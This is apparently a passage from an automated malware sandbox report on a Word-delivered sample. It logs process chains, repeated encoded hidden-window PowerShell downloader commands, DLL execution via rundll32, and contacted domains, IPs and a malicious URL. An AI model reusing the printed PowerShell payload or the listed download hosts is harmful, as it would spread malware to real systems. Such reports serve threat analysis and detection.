ZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hvayvymqsut\qurpqzzbqs.opz',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxohzthmdfatnoq\lqaarocqybnpxa.zgv',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bajrh\emiy.exu',Control_RunDLL Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10004C5A cpuid 6_2_10004C5A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter, 6_2_10007D46
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 341769 Sample: sample2.bin Startdate: 19/01/2021 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Antivirus detection for URL or domain 2->56 58 16 other signatures 2->58 11 cmd.exe 2->11         started        14 WINWORD.EXE 293 23 2->14         started        process3 signatures4 66 Suspicious powershell command line found 11->66 68 Very long command line found 11->68 70 Encrypted powershell cmdline option found 11->70 72 PowerShell case anomaly found 11->72 16 powershell.exe 12 9 11->16         started        21 msg.exe 11->21         started        process5 dnsIp6 40 freelancerwebdesignerhyderabad.com 162.241.148.243, 49169, 80 UNIFIEDLAYER-AS-1US United States 16->40 42 mikegeerinck.com 35.214.199.246, 443, 49167, 49168 GOOGLE-2US United States 16->42 44 admintk.com 210.56.52.6, 443, 49165, 49166 SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong Hong Kong 16->44 38 C:\Users\user\Db_bh30\Yf5be5g\A69S.dll, PE32 16->38 dropped 60 Powershell drops PE file 16->60 23 rundll32.exe 16->23         started        file7 signatures8 process9 process10 25 rundll32.exe 15 23->25         started        signatures11 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->64 28 rundll32.exe 5 25->28         started        process12 signatures13 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->74 31 rundll32.exe 5 28->31         started        process14 signatures15 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->76 34 rundll32.exe 13 31->34         started        process16 dnsIp17 46 90.160.138.175, 80 UNI2-ASES Spain 34->46 48 74.222.117.42, 80 FTC-INETUS United States 34->48 50 157.245.123.197, 8080 DIGITALOCEAN-ASNUS United States 34->50 62 System process connects to network (likely due to code injection or exploit) 34->62 signatures18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
210.56.52.6
 unknown Hong Kong
38197 SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong false
162.241.148.243
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
157.245.123.197
 unknown United States
14061 DIGITALOCEAN-ASNUS true
90.160.138.175
 unknown Spain
12479 UNI2-ASES true
35.214.199.246
 unknown United States
19527 GOOGLE-2US true
74.222.117.42
 unknown United States
20257 FTC-INETUS true

Contacted Domains

Name IP Active
freelancerwebdesignerhyderabad.com 162.241.148.243 true
admintk.com 210.56.52.6 true
mikegeerinck.com 35.214.199.246 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://freelancerwebdesignerhyderabad.com/cgi-bin/S/ true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown